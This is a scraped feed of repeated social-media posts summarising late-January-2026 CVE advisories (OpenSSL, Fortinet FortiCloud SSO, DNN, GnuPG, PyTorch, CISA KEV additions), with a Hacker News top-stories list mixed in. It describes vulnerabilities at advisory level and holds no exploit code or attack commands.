This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21569/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21569 - High (7.9)
This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.
This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21569/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T00:32:44
14 posts
π° Today's Top 21 Hacker News Stories (Sorted by Score) π°
----------------------------------------
π Title: TikTok users can't upload anti-ICE videos. The company blames tech issues
π URL: https://www.cnn.com/2026/01/26/tech/tiktok-ice-censorship-glitch-cec
π Score: [983]
π¬ Discussion: https://news.ycombinator.com/item?id=46779809
----------------------------------------
π Title: Heathrow scraps liquid container limit
π URL: https://www.bbc.com/news/articles/c1evvx89559o
π Score: [576]
π¬ Discussion: https://news.ycombinator.com/item?id=46736815
----------------------------------------
π Title: Cloudflare claimed they implemented Matrix on Cloudflare workers. They didn't
π URL: https://tech.lgbt/@JadedBlueEyes/115967791152135761
π Score: [392]
π¬ Discussion: https://news.ycombinator.com/item?id=46781516
----------------------------------------
π Title: I made my own Git
π URL: https://tonystr.net/blog/git_immitation
π Score: [287]
π¬ Discussion: https://news.ycombinator.com/item?id=46778341
----------------------------------------
π Title: U.S. government has lost more than 10k STEM PhDs since Trump took office
π URL: https://www.science.org/content/article/u-s-government-has-lost-more-10-000-stem-ph-d-s-trump-took-office
π Score: [279]
π¬ Discussion: https://news.ycombinator.com/item?id=46784263
----------------------------------------
π Title: 430k-year-old well-preserved wooden tools are the oldest ever found
π URL: https://www.nytimes.com/2026/01/26/science/archaeology-neanderthals-tools.html
π Score: [212]
π¬ Discussion: https://news.ycombinator.com/item?id=46781530
----------------------------------------
π Title: Xfwl4 β The Roadmap for a Xfce Wayland Compositor
π URL: https://alexxcons.github.io/blogpost_15.html
π Score: [211]
π¬ Discussion: https://news.ycombinator.com/item?id=46779645
----------------------------------------
π Title: Velox: A Port of Tauri to Swift by Miguel de Icaza
π URL: https://github.com/velox-apps/velox
π Score: [161]
π¬ Discussion: https://news.ycombinator.com/item?id=46687729
----------------------------------------
π Title: Snow Simulation Toy
π URL: https://potch.me/2026/snow-simulation-toy.html
π Score: [150]
π¬ Discussion: https://news.ycombinator.com/item?id=46691548
----------------------------------------
π Title: SoundCloud Data Breach Now on HaveIBeenPwned
π URL: https://haveibeenpwned.com/Breach/SoundCloud
π Score: [81]
π¬ Discussion: https://news.ycombinator.com/item?id=46782930
----------------------------------------
π Title: A simulation where life unfolds in real time
π URL: https://soupof.life
π Score: [78]
π¬ Discussion: https://news.ycombinator.com/item?id=46702948
----------------------------------------
π Title: Lennart Poettering, Christian Brauner founded a new company
π URL: https://amutable.com/about
π Score: [74]
π¬ Discussion: https://news.ycombinator.com/item?id=46784572
----------------------------------------
π Title: Prism
π URL: https://openai.com/index/introducing-prism
π Score: [64]
π¬ Discussion: https://news.ycombinator.com/item?id=46783752
----------------------------------------
π Title: A first look at Aperture by Tailscale (private alpha)
π URL: https://tailscale.com/blog/aperture-private-alpha
π Score: [62]
π¬ Discussion: https://news.ycombinator.com/item?id=46782091
----------------------------------------
π Title: OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
π URL: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
π Score: [53]
π¬ Discussion: https://news.ycombinator.com/item?id=46782662
----------------------------------------
π Title: Doing the thing is doing the thing
π URL: https://www.softwaredesign.ing/blog/doing-the-thing-is-doing-the-thing
π Score: [53]
π¬ Discussion: https://news.ycombinator.com/item?id=46776155
----------------------------------------
π Title: Flexible use of a multi-purpose tool by a cow
π URL: https://doi.org/10.1016/j.cub.2025.11.059
π Score: [48]
π¬ Discussion: https://news.ycombinator.com/item?id=46711159
----------------------------------------
π Title: Two Twisty Shapes Resolve a Centuries-Old Topology Puzzle
π URL: https://www.quantamagazine.org/two-twisty-shapes-resolve-a-centuries-old-topology-puzzle-20260120/
π Score: [40]
π¬ Discussion: https://news.ycombinator.com/item?id=46770855
----------------------------------------
π Title: AI2: Open Coding Agents
π URL: https://allenai.org/blog/open-coding-agents
π Score: [27]
π¬ Discussion: https://news.ycombinator.com/item?id=46783017
----------------------------------------
π Title: One Human and One Agent = One Browser from Scratch
π URL: https://simonwillison.net/2026/Jan/27/one-human-one-agent-one-browser/
π Score: [25]
π¬ Discussion: https://news.ycombinator.com/item?id=46783024
----------------------------------------
π Title: Clawdbot Renames to Moltbot
π URL: https://github.com/moltbot/moltbot/commit/6d16a658e5ebe6ce15856565a47090d5b9d5dfb6
π Score: [19]
π¬ Discussion: https://news.ycombinator.com/item?id=46783863
----------------------------------------
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
Discussion: https://news.ycombinator.com/item?id=46782662
OpenSSL Security Advisory
https://openssl-library.org/news/secadv/20260127.txt
One high, one medium, and 9 low severity issues.
The high severity is a stack buffer overflow in CMS AuthEnvelopedData parsing (CVE-2025-15467): attacker provides an oversized IV, leading to buffer overflow prior to authentication, possibly leading to remote code execution if you're parsing untrusted CMS or PKCS#7 content with AEAD (e.g., AES-GCM).
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
Comments: https://news.ycombinator.com/item?id=46782662
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
#ycombinator
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing - https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
Discussion: https://news.ycombinator.com/item?id=46782662
OpenSSL Security Advisory
https://openssl-library.org/news/secadv/20260127.txt
One high, one medium, and 9 low severity issues.
The high severity is a stack buffer overflow in CMS AuthEnvelopedData parsing (CVE-2025-15467): attacker provides an oversized IV, leading to buffer overflow prior to authentication, possibly leading to remote code execution if you're parsing untrusted CMS or PKCS#7 content with AEAD (e.g., AES-GCM).
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
Link: https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
Comments: https://news.ycombinator.com/item?id=46782662
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
#ycombinator
OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##OpenSSL: Stack buffer overflow in CMS AuthEnvelopedData parsing
https://openssl-library.org/news/vulnerabilities/#CVE-2025-15467
##updated 2026-01-28T00:15:51.050000
2 posts
π CVE-2026-24837 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24837/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24837 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24837/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T00:15:50.910000
2 posts
π CVE-2026-24836 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include script...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24836/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24836 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include script...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24836/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T00:15:50.773000
2 posts
π CVE-2026-24833 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24833/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24833 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24833/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T00:15:50.170000
2 posts
π΄ CVE-2026-23830 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Func...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-23830 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Func...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T00:15:49.770000
2 posts
π CVE-2025-67645 - High (8.8)
OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request paramet...
π https://www.thehackerwire.com/vulnerability/CVE-2025-67645/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-67645 - High (8.8)
OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request paramet...
π https://www.thehackerwire.com/vulnerability/CVE-2025-67645/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T00:15:49.607000
2 posts
π CVE-2025-55292 - High (8.2)
Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by...
π https://www.thehackerwire.com/vulnerability/CVE-2025-55292/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-55292 - High (8.2)
Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by...
π https://www.thehackerwire.com/vulnerability/CVE-2025-55292/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T22:15:58.067000
7 posts
βΌοΈCVE-2026-24858: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability
Severity: Critical
CVSS: 9.8
Zero Day: Yes
CVE Published: January 27th, 2026
Advisory: https://github.com/advisories/GHSA-2x38-48vp-w23x
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.
##π¨ [CISA-2026:0127] CISA Adds One Known Exploited Vulnerability to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0127)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-24858 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24858)
- Name: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Fortinet
- Product: Multiple Products
- Notes: Please adhere to Fortinet's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Fortinet products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as they become available. For more information please see: https://fortiguard.fortinet.com/psirt/FG-IR-26-060 ; https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios ; https://nvd.nist.gov/vuln/detail/CVE-2026-24858
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260127 #cisa20260127 #cve_2026_24858 #cve202624858
##Fortinet Confirms Actively Exploited Critical FortiCloud SSO Zero-Day (CVE-2026-24858)
A New Authentication Bypass Shakes Fortinetβs Security Ecosystem Fortinet has confirmed the active exploitation of a previously unknown, critical authentication bypass vulnerability affecting its FortiCloud single sign-on (SSO) infrastructure. Tracked as CVE-2026-24858, the flaw allows attackers to gain unauthorized administrative access to Fortinet devices across different customerβ¦
##A single flaw in FortiCloud SSO let hackers jump from their own accounts straight into other companiesβ networks, creating admin access in seconds. How did this happen and what does it mean for SSO security everywhere?
##π΄ CVE-2026-24858 - Critical (9.8)
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24858/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##βΌοΈCVE-2026-24858: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability
Severity: Critical
CVSS: 9.8
Zero Day: Yes
CVE Published: January 27th, 2026
Advisory: https://github.com/advisories/GHSA-2x38-48vp-w23x
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.
##π΄ CVE-2026-24858 - Critical (9.8)
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24858/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T22:15:57.097000
2 posts
π CVE-2026-24778 - High (8.8)
Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaSc...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24778/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24778 - High (8.8)
Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaSc...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24778/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T22:15:56.790000
4 posts
π CVE-2026-24765 - High (7.8)
PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists i...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24765/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##RE: https://phpc.social/@sebastian/115965753874226093
This is CVE-2026-24765 now.
##π CVE-2026-24765 - High (7.8)
PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists i...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24765/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##RE: https://phpc.social/@sebastian/115965753874226093
This is CVE-2026-24765 now.
##updated 2026-01-27T21:32:51
2 posts
π CVE-2025-59106 - High (8.8)
The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabi...
π https://www.thehackerwire.com/vulnerability/CVE-2025-59106/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-59106 - High (8.8)
The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabi...
π https://www.thehackerwire.com/vulnerability/CVE-2025-59106/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T21:31:56
4 posts
π΄ CVE-2025-21589 - Critical (9.8)
An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.
This issue affects Sess...
π https://www.thehackerwire.com/vulnerability/CVE-2025-21589/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2025-21589 - Critical (9.8)
An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.
This issue affects Sess...
π https://www.thehackerwire.com/vulnerability/CVE-2025-21589/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2025-21589 - Critical (9.8)
An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.
This issue affects Sess...
π https://www.thehackerwire.com/vulnerability/CVE-2025-21589/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2025-21589 - Critical (9.8)
An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.
This issue affects Sess...
π https://www.thehackerwire.com/vulnerability/CVE-2025-21589/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T21:31:49
2 posts
π CVE-2026-24881 - High (8.1)
In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of serv...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24881 - High (8.1)
In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of serv...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T20:10:54
2 posts
π CVE-2026-24747 - High (8.8)
PyTorch is a Python package that provides tensor computation. Prior to version 2.10.0, a vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., w...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24747/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24747 - High (8.8)
PyTorch is a Python package that provides tensor computation. Prior to version 2.10.0, a vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., w...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24747/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T19:16:16.670000
2 posts
π CVE-2026-24882 - High (8.4)
In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24882/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24882 - High (8.4)
In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24882/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:33:14
3 posts
1 repos
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability
CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability
##CVE ID: CVE-2026-23760
Vendor: SmarterTools
Product: SmarterMail
Date Added: 2026-01-26
Notes: https://www.smartertools.com/smartermail/release-notes/current ; https://nvd.nist.gov/vuln/detail/CVE-2026-23760
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-23760
CISA has updated the KEV catalogue.
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-24061
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-23760
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2025-52691
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2018-14634 #CISA #Linux #infosec #vulnerability #GNU
##updated 2026-01-27T18:32:29
4 posts
New advisory.
High severity NVIDIA runx vulnerability: CVE-2025-33234 https://nvidia.custhelp.com/app/answers/detail/a_id/5764 #Nvidia #vulnerability #infosec
##π CVE-2025-33234 - High (7.8)
NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.
π https://www.thehackerwire.com/vulnerability/CVE-2025-33234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##New advisory.
High severity NVIDIA runx vulnerability: CVE-2025-33234 https://nvidia.custhelp.com/app/answers/detail/a_id/5764 #Nvidia #vulnerability #infosec
##π CVE-2025-33234 - High (7.8)
NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.
π https://www.thehackerwire.com/vulnerability/CVE-2025-33234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:29
2 posts
π CVE-2026-23593 - High (7.5)
A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affect...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23593/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23593 - High (7.5)
A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affect...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23593/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:28
4 posts
π΄ CVE-2026-24874 - Critical (9.1)
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24874 - Critical (9.1)
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24874 - Critical (9.1)
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24874 - Critical (9.1)
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:28
2 posts
π CVE-2026-24873 - High (7.8)
Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24873/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24873 - High (7.8)
Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24873/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:25
2 posts
π΄ CVE-2026-24832 - Critical (9.8)
Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24832/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24832 - Critical (9.8)
Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24832/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:16
4 posts
π CVE-2026-24831 - High (7.5)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24831/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24831 - High (7.5)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24831/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24831 - High (7.5)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24831/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24831 - High (7.5)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24831/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:15:55.383000
2 posts
π CVE-2026-22260 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `respo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-22260 - High (7.5)
